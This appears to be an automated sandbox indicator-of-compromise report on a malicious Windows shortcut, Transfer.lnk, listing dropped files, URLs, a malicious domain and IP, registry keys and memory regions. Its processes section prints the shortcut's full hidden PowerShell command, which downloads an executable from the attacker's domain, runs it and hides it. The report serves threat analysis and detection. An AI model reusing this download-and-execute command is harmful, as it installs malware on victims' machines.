IOC Report
Transfer.lnk

loading gif

Files

File Path
Type
Category
Malicious
Transfer.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
initial sample
malicious
C:\Users\user\Desktop\Ojtjewi.exe
HTML document, ASCII text, with very long lines (394)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25sjz4ab.5hb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ez5ygt0.uqv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lamja0e.ikb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hy5gb3l4.dyu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIKI9XNTYCRZ3YC349AU.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e19ffc3c42b086ac.customDestinations-ms (copy)
data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe','Ojtjewi.exe');./'Ojtjewi.exe';(get-item 'Ojtjewi.exe').Attributes += 'Hidden';
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://www.sodiumlaurethsulfatedesyroyer.com
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/ow
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe
188.114.96.3
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/
unknown
malicious
https://www.cloudflare.com/learning/access-management/phishing-attack/
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
http://upx.sf.net
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
https://www.cloudflare.com/5xx-error-landing
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.sodiumlaurethsulfatedesyroyer.com
188.114.96.3
malicious

IPs

IP
Domain
Country
Malicious
188.114.96.3
www.sodiumlaurethsulfatedesyroyer.com
European Union
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1FDD83B3000
trusted library allocation
page read and write
C12B1F8000
stack
page read and write
1FDD5AF9000
heap
page read and write
1FDEFE2C000
heap
page read and write
7FFD9B4C0000
trusted library allocation
page read and write
1FDD8D4D000
trusted library allocation
page read and write
1FDEFDB0000
heap
page read and write
1FDD970B000
trusted library allocation
page read and write
1FDD78E0000
heap
page execute and read and write
C12C0CE000
stack
page read and write
7FFD9B730000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
1FDD5A60000
heap
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
1FDD7920000
trusted library allocation
page read and write
1FDD5BF0000
heap
page read and write
1FDEFE1F000
heap
page read and write
7FFD9B81C000
trusted library allocation
page read and write
1FDD7A20000
heap
page read and write
1FDD5B55000
heap
page read and write
1FDD5AC0000
heap
page read and write
1FDD7C5A000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
1FDD5B32000
heap
page read and write
1FDF0280000
heap
page read and write
C12B1FE000
stack
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1FDEFF87000
heap
page read and write
1FDEFEB9000
heap
page read and write
C12B179000
stack
page read and write
1FDD5B50000
heap
page read and write
7DF4642F0000
trusted library allocation
page execute and read and write
1FDD98CB000
trusted library allocation
page read and write
1FDEFEAB000
heap
page read and write
7FFD9B720000
trusted library allocation
page read and write
1FDE7D1A000
trusted library allocation
page read and write
7FFD9B4B2000
trusted library allocation
page read and write
1FDEFBC6000
heap
page read and write
1FDE7A51000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
1FDE7A31000
trusted library allocation
page read and write
1FDD8BA3000
trusted library allocation
page read and write
1FDD78B0000
heap
page readonly
C12B5FB000
stack
page read and write
1FDE7AA1000
trusted library allocation
page read and write
1FDEFF31000
heap
page read and write
7FFD9B650000
trusted library allocation
page read and write
1FDD5B9E000
heap
page read and write
7FFD9B4B4000
trusted library allocation
page read and write
1FDD91A8000
trusted library allocation
page read and write
7FFD9B596000
trusted library allocation
page execute and read and write
7FFD9B4D0000
trusted library allocation
page read and write
C12C14D000
stack
page read and write
C12B57F000
stack
page read and write
C12AA95000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9B740000
trusted library allocation
page read and write
7FFD9B4B3000
trusted library allocation
page execute and read and write
1FDD5B9A000
heap
page read and write
1FDEFF29000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
1FDD8C71000
trusted library allocation
page read and write
7FFD9B8A3000
trusted library allocation
page read and write
1FDD5960000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
1FDD978B000
trusted library allocation
page read and write
1FDEFF49000
heap
page read and write
1FDE7D26000
trusted library allocation
page read and write
1FDD78D0000
trusted library allocation
page read and write
7FFD9B809000
trusted library allocation
page read and write
C12B07E000
stack
page read and write
C12ABDE000
stack
page read and write
1FDD84B7000
trusted library allocation
page read and write
7FFD9B7E3000
trusted library allocation
page read and write
1FDEFF9C000
heap
page read and write
1FDEFEA2000
heap
page read and write
7FFD9B566000
trusted library allocation
page read and write
7FFD9B964000
trusted library allocation
page read and write
C12B47E000
stack
page read and write
1FDF028E000
heap
page read and write
1FDEFF01000
heap
page read and write
1FDD7870000
trusted library allocation
page read and write
1FDD78C7000
heap
page execute and read and write
7FFD9B670000
trusted library allocation
page execute and read and write
1FDE7D1E000
trusted library allocation
page read and write
1FDD8389000
trusted library allocation
page read and write
C12AF7E000
stack
page read and write
C12B379000
stack
page read and write
C12B3FE000
stack
page read and write
7FFD9B918000
trusted library allocation
page read and write
7FFD9B56C000
trusted library allocation
page execute and read and write
7FFD9B820000
trusted library allocation
page read and write
1FDD5AA0000
heap
page read and write
1FDD8BDF000
trusted library allocation
page read and write
1FDEFBD6000
heap
page read and write
1FDD97AA000
trusted library allocation
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
1FDD5D25000
heap
page read and write
1FDEFEC4000
heap
page read and write
1FDD78F0000
trusted library allocation
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
1FDEFCA0000
heap
page read and write
7FFD9B700000
trusted library allocation
page read and write
7FFD9B8C0000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
1FDEFC08000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
1FDD94B1000
trusted library allocation
page read and write
1FDEFFD0000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page execute and read and write
C12AB9E000
stack
page read and write
1FDEFF1C000
heap
page read and write
1FDD7AB9000
trusted library allocation
page read and write
1FDD9065000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
7DF464300000
trusted library allocation
page execute and read and write
C12B277000
stack
page read and write
7FFD9B962000
trusted library allocation
page read and write
1FDD5D40000
heap
page read and write
1FDD83AF000
trusted library allocation
page read and write
1FDEFD80000
heap
page execute and read and write
7FFD9B804000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
1FDEFEE7000
heap
page read and write
7FFD9B680000
trusted library allocation
page execute and read and write
1FDEFBA0000
heap
page read and write
C12B0FF000
stack
page read and write
1FDD5B71000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
C12AE7E000
stack
page read and write
7FFD9B570000
trusted library allocation
page execute and read and write
7FFD9B840000
trusted library allocation
page read and write
1FDEFB72000
heap
page read and write
1FDF02A0000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B560000
trusted library allocation
page read and write
7FFD9B5D0000
trusted library allocation
page execute and read and write
C12B4FC000
stack
page read and write
C12B2FA000
stack
page read and write
1FDD5D45000
heap
page read and write
1FDD83A1000
trusted library allocation
page read and write
1FDD5A40000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
1FDD5B5D000
heap
page read and write
7FFD9B818000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
1FDE7D28000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
C12AFFB000
stack
page read and write
1FDEFEA0000
heap
page read and write
7FFD9B50C000
trusted library allocation
page execute and read and write
1FDD9842000
trusted library allocation
page read and write
1FDD838E000
trusted library allocation
page read and write
1FDEFB40000
heap
page read and write
1FDE7A61000
trusted library allocation
page read and write
7FFD9B661000
trusted library allocation
page read and write
7DF4642E0000
trusted library allocation
page execute and read and write
1FDD78C0000
heap
page execute and read and write
7FFD9B8D0000
trusted library allocation
page read and write
1FDD7A31000
trusted library allocation
page read and write
C12BFCE000
stack
page read and write
7FFD9B810000
trusted library allocation
page read and write
7FFD9B4BD000
trusted library allocation
page execute and read and write
1FDEFF3C000
heap
page read and write
C12AEFD000
stack
page read and write
7FFD9B710000
trusted library allocation
page read and write
C12C04E000
stack
page read and write
1FDD9630000
trusted library allocation
page read and write
1FDEFA38000
heap
page read and write
7FFD9B6A0000
trusted library allocation
page execute and read and write
1FDD83C7000
trusted library allocation
page read and write
1FDEFBA2000
heap
page read and write
1FDD78A0000
trusted library allocation
page read and write
7FFD9B66A000
trusted library allocation
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
C12AB1E000
stack
page read and write
7FFD9B692000
trusted library allocation
page read and write
1FDEFDDA000
heap
page read and write
7FFD9B4CB000
trusted library allocation
page read and write
1FDD8D25000
trusted library allocation
page read and write
1FDEFE02000
heap
page read and write
1FDD5D20000
heap
page read and write
There are 177 hidden memdumps, click here to show them.